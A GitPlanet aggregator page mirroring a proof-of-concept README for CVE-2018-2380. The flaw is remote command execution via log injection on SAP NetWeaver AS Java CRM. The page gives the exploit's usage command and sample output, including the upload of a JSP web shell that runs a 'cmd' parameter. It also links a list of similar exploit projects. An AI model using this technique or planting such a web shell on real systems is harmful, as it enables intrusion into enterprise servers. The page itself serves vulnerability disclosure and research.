GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → erpscanteam → CVE-2018-2380

erpscanteam / CVE-2018-2380

Licence: other
PoC of Remote Command Execution via Log injection on SAP NetWeaver AS JAVA CRM

Programming Languages

python
139335 projects - #7 most used programming language

Labels

exploitsapcve-2018-2380

Projects that are alternatives of or similar to CVE-2018-2380

SAP vulnerabilities
DoS PoC's for SAP products
Stars: ✭ 47 (-14.55%)
Mutual labels:  exploit, sap
btp-business-application-studio
Markdown source for the SAP Business Application Studio documentation. Enables feedback and contributions to improve the documentation.
Stars: ✭ 16 (-70.91%)
Mutual labels:  sap
Saucerframe
python3批量poc检测工具
Stars: ✭ 242 (+340%)
Mutual labels:  exploit
pysploit-framework
free exploit framework written use python language version 3.3
Stars: ✭ 33 (-40%)
Mutual labels:  exploit
cve-2016-1764
Extraction of iMessage Data via XSS
Stars: ✭ 52 (-5.45%)
Mutual labels:  exploit
armroper
ARM rop chain gadget searcher
Stars: ✭ 36 (-34.55%)
Mutual labels:  exploit
Icg Autoexploiterbot
Wordpress 🔥 Joomla 🔥 Drupal 🔥 OsCommerce 🔥 Prestashop 🔥 Opencart 🔥
Stars: ✭ 242 (+340%)
Mutual labels:  exploit
Brahma
Brahma - Privilege elevation exploit for Nintendo 3DS
Stars: ✭ 34 (-38.18%)
Mutual labels:  exploit
purelove
Purelove is a lightweight penetration testing framework, in order to better security testers testing holes with use.
Stars: ✭ 52 (-5.45%)
Mutual labels:  exploit
IAT API
Assembly block for finding and calling the windows API functions inside import address table(IAT) of the running PE file.
Stars: ✭ 63 (+14.55%)
Mutual labels:  exploit
dheater
D(HE)ater is a proof of concept implementation of the D(HE)at attack (CVE-2002-20001) through which denial-of-service can be performed by enforcing the Diffie-Hellman key exchange.
Stars: ✭ 142 (+158.18%)
Mutual labels:  exploit
reosploit
A Tool that Finds, Enumerates, and Exploits Reolink Cameras.
Stars: ✭ 89 (+61.82%)
Mutual labels:  exploit
lumira-extension-viz
lumira
Stars: ✭ 84 (+52.73%)
Mutual labels:  sap
ManageEngineFileUploadExploit
POC script for the ManageEngine Multiple Products Authenticated File Upload Exploit
Stars: ✭ 14 (-74.55%)
Mutual labels:  exploit
fedramp-automation
FedRAMP Automation
Stars: ✭ 175 (+218.18%)
Mutual labels:  sap
Xxexploiter
Tool to help exploit XXE vulnerabilities
Stars: ✭ 243 (+341.82%)
Mutual labels:  exploit
openui5-tour
OpenUI5 Tour enables an user-friendly way to showcase products and features in your website.
Stars: ✭ 21 (-61.82%)
Mutual labels:  sap
inthewilddb
Hourly updated database of exploit and exploitation reports
Stars: ✭ 127 (+130.91%)
Mutual labels:  exploit
rsGen
rsGen is a Reverse Shell Payload Generator for hacking.
Stars: ✭ 71 (+29.09%)
Mutual labels:  exploit
ABAP-Library
Useful ABAP code snippets
Stars: ✭ 118 (+114.55%)
Mutual labels:  sap
View All Similar Projects ➔

CVE-2018-2380 (CVSS v3 Base Score: 6.6/10)

PoC of Remote Command Execution via Log injection on SAP NetWeaver AS JAVA CRM Script usage example

python crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true

Where --host is a SAP server IP --port SAP NetWeaver AS Java port username and password of SAP administrator you can get using SAP Redwood directory traversal vulnerability.

example script usage output

C:\exploits\SAP>crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true

 _______  _______  _______  _______  _______  _______  _
(  ____ \(  ____ )(  ____ )(  ____ \(  ____ \(  ___  )( (    /|
| (    \/| (    )|| (    )|| (    \/| (    \/| (   ) ||  \  ( |
| (__    | (____)|| (____)|| (_____ | |      | (___) ||   \ | |
|  __)   |     __)|  _____)(_____  )| |      |  ___  || (\ \) |
| (      | (\ (   | (            ) || |      | (   ) || | \   |
| (____/\| ) \ \__| )      /\____) || (____/\| )   ( || )  \  |
(_______/|/   \__/|/       \_______)(_______/|/     \||/    )_)
Vahagn @vah_13 Vardanian
Bob @NewFranny
Mathieu @gelim
CVE-2018-2380


[!] Try to get RCE using log injection
[!] Get j_salt token for requests
[!] Login to the SAP portal
[!] Change log path
[!] Upload "Runtime.getRuntime().exec(request.getParameter("cmd")) " shell to https://127.0.0.1:50001/ERPScan_shell_31275.0.jsp?cmd=ipconfig
[!] Restore logs path to ./default_log_name.log
[!] Enjoy!

C:\exploits\SAP>
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].